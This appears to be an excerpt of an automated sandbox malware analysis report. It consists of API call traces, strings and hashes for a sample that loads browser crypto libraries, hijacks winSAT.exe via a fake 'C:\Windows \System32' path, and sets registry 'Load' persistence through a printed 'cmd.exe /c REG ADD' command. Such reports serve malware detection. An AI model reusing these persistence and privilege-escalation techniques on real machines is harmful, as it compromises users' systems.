                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_errcodesqlite3_free$sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_closesqlite3_initializesqlite3_overload_function
                                                                                      • String ID: BINARY$MATCH$NOCASE$RTRIM$dbstat$main$temp
                                                                                      • API String ID: 3346957571-2123230702
                                                                                      • Opcode ID: 61e42bdce5fcb0865ba151d6fa0f49d1fbdd560bde78124f0f49671e44f5c05b
                                                                                      • Instruction ID: 65bd57e074a21fa9313fe1d27ff32de174194ae93784101149fee50f1ee1ad5e
                                                                                      • Opcode Fuzzy Hash: 61e42bdce5fcb0865ba151d6fa0f49d1fbdd560bde78124f0f49671e44f5c05b
                                                                                      • Instruction Fuzzy Hash: 09B1D2B1A05340ABEF109F268CC5F9B3FA8AF4131CF0444A9F9049FA92F774D9558BA0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1003 6ccee5c6-6ccee5f3 call 6cd15ecc 1006 6ccee607-6ccee626 call 6cceeb27 1003->1006 1007 6ccee5f5-6ccee5ff call 6cd1cb04 1003->1007 1012 6ccee600-6ccee602 1006->1012 1013 6ccee628-6ccee63c call 6cd1ed12 1006->1013 1007->1012 1014 6ccee818-6ccee81e 1012->1014 1017 6ccee642-6ccee655 call 6cd1ed12 1013->1017 1018 6ccee763-6ccee771 call 6cd1ca25 1013->1018 1017->1018 1025 6ccee65b-6ccee66f call 6cd1ed12 1017->1025 1023 6ccee77a-6ccee77c 1018->1023 1024 6ccee773-6ccee779 call 6cd1ca25 1018->1024 1027 6ccee77e-6ccee784 call 6cd1ca25 1023->1027 1028 6ccee785-6ccee78a 1023->1028 1024->1023 1025->1018 1035 6ccee675-6ccee689 call 6cd1ed12 1025->1035 1027->1028 1032 6ccee78c-6ccee792 call 6cd1ca25 1028->1032 1033 6ccee793-6ccee798 1028->1033 1032->1033 1036 6ccee79a-6ccee7a0 call 6cd1ca25 1033->1036 1037 6ccee7a1-6ccee7a6 1033->1037 1035->1018 1050 6ccee68f-6ccee6a3 call 6cd1ed12 1035->1050 1036->1037 1043 6ccee7af-6ccee7b4 1037->1043 1044 6ccee7a8-6ccee7ae call 6cd1ca25 1037->1044 1048 6ccee7bd-6ccee7c2 1043->1048 1049 6ccee7b6-6ccee7bc call 6cd1ca25 1043->1049 1044->1043 1053 6ccee7cb-6ccee7d0 1048->1053 1054 6ccee7c4-6ccee7ca call 6cd1ca25 1048->1054 1049->1048 1050->1018 1066 6ccee6a9-6ccee6bd call 6cd1ed12 1050->1066 1055 6ccee7d9-6ccee7de 1053->1055 1056 6ccee7d2-6ccee7d8 call 6cd1ca25 1053->1056 1054->1053 1063 6ccee7e7-6ccee7e9 1055->1063 1064 6ccee7e0-6ccee7e6 call 6cd1ca25 1055->1064 1056->1055 1068 6ccee7eb-6ccee803 SECMOD_LoadModule PR_smprintf_free 1063->1068 1069 6ccee816 1063->1069 1064->1063 1066->1018 1075 6ccee6c3-6ccee6d7 call 6cd1ed12 1066->1075 1068->1069 1072 6ccee805-6ccee809 1068->1072 1069->1014 1072->1069 1074 6ccee80b-6ccee811 call 6cd14161 1072->1074 1074->1069 1075->1018 1080 6ccee6dd-6ccee6f1 call 6cd1ed12 1075->1080 1080->1018 1083 6ccee6f3-6ccee709 call 6cd1ed12 1080->1083 1083->1018 1086 6ccee70b-6ccee761 PR_smprintf 1083->1086 1086->1018
                                                                                      APIs
                                                                                        • Part of subcall function 6CD15ECC: PR_CallOnce.NSS3(6CD89674,6CD15EE3,6CCEE5F1,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 6CD15ED6
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 6CCEE5FA
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      Strings
                                                                                      • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CCEE753
                                                                                      • NSS Internal Module, xrefs: 6CCEE749
                                                                                      • ,defaultModDB,internalKeySlot, xrefs: 6CCEE715
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallErrorError_OnceUtil
                                                                                      • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"
                                                                                      • API String ID: 177172103-1519169817
                                                                                      • Opcode ID: 2469691379162ce496a13960a099e0db234bd8eddd315ca99abce9bfcfecfb57
                                                                                      • Instruction ID: b839f3129719895eb49677376cab505525403ed6a1ef7bb2a6aafeec9ae1b6e8
                                                                                      • Opcode Fuzzy Hash: 2469691379162ce496a13960a099e0db234bd8eddd315ca99abce9bfcfecfb57
                                                                                      • Instruction Fuzzy Hash: 1C617971A04206BBEF119FA5EC85BEE77F8AF49684F104039F914E6E90E735C91097A4
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0041551D
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                                                                        • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                                        • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                                        • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                                        • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                                        • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                                        • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                                                                      • GetLastError.KERNEL32 ref: 004155AB
                                                                                      • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                                                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                                                                      • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                                                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 0041567B
                                                                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0041568E
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041569D
                                                                                        • Part of subcall function 00412F55: CloseHandle.KERNEL32(?,00000000,?,?,0040555F,?,?,00000000,00000000,?,?,?,00405909,?,00000000,00000000), ref: 00412F7F
                                                                                        • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                                                                        • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                                                                        • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                                                                        • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winSAT.exe,?,?,?,?,?,?,?,?,?,?,?,00405909,?,00000000), ref: 00412FF7
                                                                                        • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                                                                        • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winmm.dll), ref: 00413029
                                                                                        • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                                                                        • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                                                                        • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                                                                        • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                                                                        • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                                                                        • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                                                                        • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                                                                        • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,759801C0,00000000), ref: 0041277D
                                                                                        • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,759801C0,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403769
                                                                                        • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,759801C0,00000000), ref: 00412133
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                                                                      • MaxConnectionsPerServer, xrefs: 00415610
                                                                                      • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                                                                      • \Microsoft Vision\, xrefs: 00415681
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HandleHeapModuleNameSystemWow64$AllocateCountCurrentDisableErrorEventFolderFreeLastPathReadRedirectionSizeTickVirtuallstrcpy
                                                                                      • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                                                      • API String ID: 651455083-2552559493
                                                                                      • Opcode ID: 3c92c766eddcea0612c5f5bfb818433aa45073162a83979c0ec4ab31dbf1606c
                                                                                      • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                                                                      • Opcode Fuzzy Hash: 3c92c766eddcea0612c5f5bfb818433aa45073162a83979c0ec4ab31dbf1606c
                                                                                      • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 6CCCD46B
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 6CCCD472
                                                                                      • GetLastError.KERNEL32 ref: 6CCCD48B
                                                                                      • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6CCCD497
                                                                                        • Part of subcall function 6CCC78D9: PR_Init.NSS3(00000000), ref: 6CCC78F7
                                                                                        • Part of subcall function 6CCC78D9: PR_Now.NSS3(?,?,00000001,00000000,00000000), ref: 6CCC7923
                                                                                        • Part of subcall function 6CCC78D9: PR_ExplodeTime.NSS3(00000000,?,?,?,00000001,00000000,00000000), ref: 6CCC792A
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?,00000000,?,?,?,00000001,00000000), ref: 6CCC796A
                                                                                        • Part of subcall function 6CCC78D9: PR_GetCurrentThread.NSS3(00000001,00000000,00000000), ref: 6CCC7974
                                                                                        • Part of subcall function 6CCC78D9: ___swprintf_l.LIBCMT(?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC799C
                                                                                        • Part of subcall function 6CCC78D9: PR_vsnprintf.NSS3(?,000001FF,?,6CCC77F9,?,000001FF,%ld[%p]: ,00000000,00000000,00000001,00000000,00000000), ref: 6CCC79BC
                                                                                        • Part of subcall function 6CCC78D9: PR_vsmprintf.NSS3(?,6CCC77F9,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC79DA
                                                                                        • Part of subcall function 6CCC78D9: EnterCriticalSection.KERNEL32(05203804,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CCC7A02
                                                                                      • GetTokenInformation.KERNELBASE(?,00000004,?,00000400,?), ref: 6CCCD4BE
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6CCCD4CA
                                                                                      • PR_Malloc.NSS3(00000000), ref: 6CCCD4D7
                                                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 6CCCD4EF
                                                                                      • GetTokenInformation.KERNELBASE(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6CCCD510
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 6CCCD51C
                                                                                      • PR_Malloc.NSS3(00000000), ref: 6CCCD529
                                                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 6CCCD541
                                                                                      • CloseHandle.KERNEL32(?), ref: 6CCCD54D
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,6CD888B0), ref: 6CCCD56B
                                                                                      Strings
                                                                                      • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6CCCD492
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$CopyCurrentInformationLengthMallocProcess___swprintf_l$AllocateCloseCriticalEnterErrorExplodeHandleInitInitializeLastOpenPrintR_vsmprintfR_vsnprintfSectionThreadTime
                                                                                      • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                      • API String ID: 913278748-1216436346
                                                                                      • Opcode ID: 6119a8f6495fe1c058acccf8f3bf5387acf8b5704a21f64355300f36931474f0
                                                                                      • Instruction ID: c5f9fef31b0e2ef83aad60a03be63bb3a4007f4fe1e027ba153a04693cb75d9c
                                                                                      • Opcode Fuzzy Hash: 6119a8f6495fe1c058acccf8f3bf5387acf8b5704a21f64355300f36931474f0
                                                                                      • Instruction Fuzzy Hash: 8F31FAF1A1011CAFEF109B64CD09BA9B7BCFB45309F8044A5E709E2190EB705E849F69
                                                                                      APIs
                                                                                        • Part of subcall function 6CD1E968: NSSUTIL_ArgStrip.NSS3(00000000,00000000,00000000,00000000,?,6CD0B29A,00000000,00000001,00000000,00000000,6CCEE7F5,?,00000000,00000000,00000000), ref: 6CD1E971
                                                                                        • Part of subcall function 6CD1E968: PL_strncasecmp.NSS3(00000000,library=,00000008,00000000,00000000,00000000,?,6CD0B29A,00000000,00000001,00000000,00000000,6CCEE7F5,?,00000000,00000000), ref: 6CD1E9A4
                                                                                        • Part of subcall function 6CD1E968: PORT_Free_Util.NSS3(00000000,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9BD
                                                                                        • Part of subcall function 6CD1E968: NSSUTIL_ArgFetchValue.NSS3(-00000008,00000000,00000000,00000000,00000000,?,?,?,?,6CCEE7F5,00000000,00000000,00000001), ref: 6CD1E9C8
                                                                                        • Part of subcall function 6CD1E968: NSSUTIL_ArgStrip.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD1EAB9
                                                                                      • PORT_Free_Util.NSS3(00000001,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B2C6
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B2D4
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B2E2
                                                                                      • PORT_Free_Util.NSS3(6CCEE7F5,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B2F0
                                                                                      • PORT_Free_Util.NSS3(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B2FE
                                                                                      • SECMOD_ReferenceModule.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B314
                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B34A
                                                                                      • PORT_SetError_Util.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B36B
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECMOD_GetModuleSpecList.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B371
                                                                                      • SECMOD_LoadModule.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B3D7
                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B3F2
                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B41B
                                                                                      • PORT_SetError_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B421
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B42E
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CD0B453
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Free_Module$Error_$Destroy$Strip$ErrorFetchL_strncasecmpListLoadReferenceSpecValue
                                                                                      • String ID:
                                                                                      • API String ID: 2856599312-0
                                                                                      • Opcode ID: a5fd444b163a04383882176ee0b24d0bfce1c4171d961a533a9ce265c6ad5667
                                                                                      • Instruction ID: 7ca85d93634be497fb05d276efa530de1a6c7054bc853b91d3346fbacbe33537
                                                                                      • Opcode Fuzzy Hash: a5fd444b163a04383882176ee0b24d0bfce1c4171d961a533a9ce265c6ad5667
                                                                                      • Instruction Fuzzy Hash: E761A272E0E215FBDF019FAD9880AEEB7B4EF4531CB24412ED55066EA0D7308A44C661
                                                                                      APIs
                                                                                        • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                                        • Part of subcall function 00412514: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,759801C0,?,?,0041270B,?,?), ref: 00412534
                                                                                        • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,759801C0,00000000), ref: 0041277D
                                                                                        • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(759801C0,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                                        • Part of subcall function 00412612: RegOpenKeyExW.KERNEL32(759801C0,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                                        • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                                                                      • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?,?,?,?,?,00000000,759801C0,00000000), ref: 0041280A
                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,0041A074,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 00412928
                                                                                        • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,759801C0,00000000), ref: 00410C44
                                                                                        • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,759801C0,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403769
                                                                                        • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,759801C0,?,?,?VA,?,00412AEE,?VA,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403477
                                                                                      • WinExec.KERNEL32(00000000,00000000), ref: 00412A20
                                                                                      • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,759801C0,00000000), ref: 00412A55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                                                      • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"$7Mw
                                                                                      • API String ID: 1503101065-2167720926
                                                                                      • Opcode ID: e40ce5f9c6dfcae3ce2e80479ef9224958c9ae1b7725825c443b4e114466134c
                                                                                      • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                                                                      • Opcode Fuzzy Hash: e40ce5f9c6dfcae3ce2e80479ef9224958c9ae1b7725825c443b4e114466134c
                                                                                      • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                                                                      APIs
                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCA2F46
                                                                                      • sqlite3_free.NSS3(00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA2F95
                                                                                      • memcpy.VCRUNTIME140(00000054,00000000,00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA2FEF
                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA300C
                                                                                      • memcpy.VCRUNTIME140(?,00000000,00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA301E
                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA304E
                                                                                      • sqlite3_free.NSS3(?,?,?,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA306C
                                                                                        • Part of subcall function 6CC8A360: sqlite3_mutex_enter.NSS3(00000000,?,6CCA363A,?,00000000,?,000000FF), ref: 6CC8A385
                                                                                        • Part of subcall function 6CC8A360: sqlite3_mutex_leave.NSS3(00000000,?,6CCA363A,?,00000000,?,000000FF), ref: 6CC8A3C0
                                                                                      • sqlite3_free.NSS3(00000000,?,?,00000000,00000000,?,?,00000000,?,00000054), ref: 6CCA3233
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_enter.NSS3(00000000,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D60
                                                                                        • Part of subcall function 6CC63D46: PR_Free.NSS3(6CCB8B5E,?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D79
                                                                                        • Part of subcall function 6CC63D46: sqlite3_mutex_leave.NSS3(?,6CCB8B5E,00000000,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63D85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpysqlite3_free$sqlite3_mutex_entersqlite3_mutex_leave$Free
                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                      • API String ID: 1188146052-3408036318
                                                                                      • Opcode ID: 7e69814b198f6c19cb0741dfbc8e98e71bb224fae5dbb2c172a1401c3aeb1ccc
                                                                                      • Instruction ID: f913cbae792b026e5f23929fc7382b15b21bc839d3996b425b960dedb9823b14
                                                                                      • Opcode Fuzzy Hash: 7e69814b198f6c19cb0741dfbc8e98e71bb224fae5dbb2c172a1401c3aeb1ccc
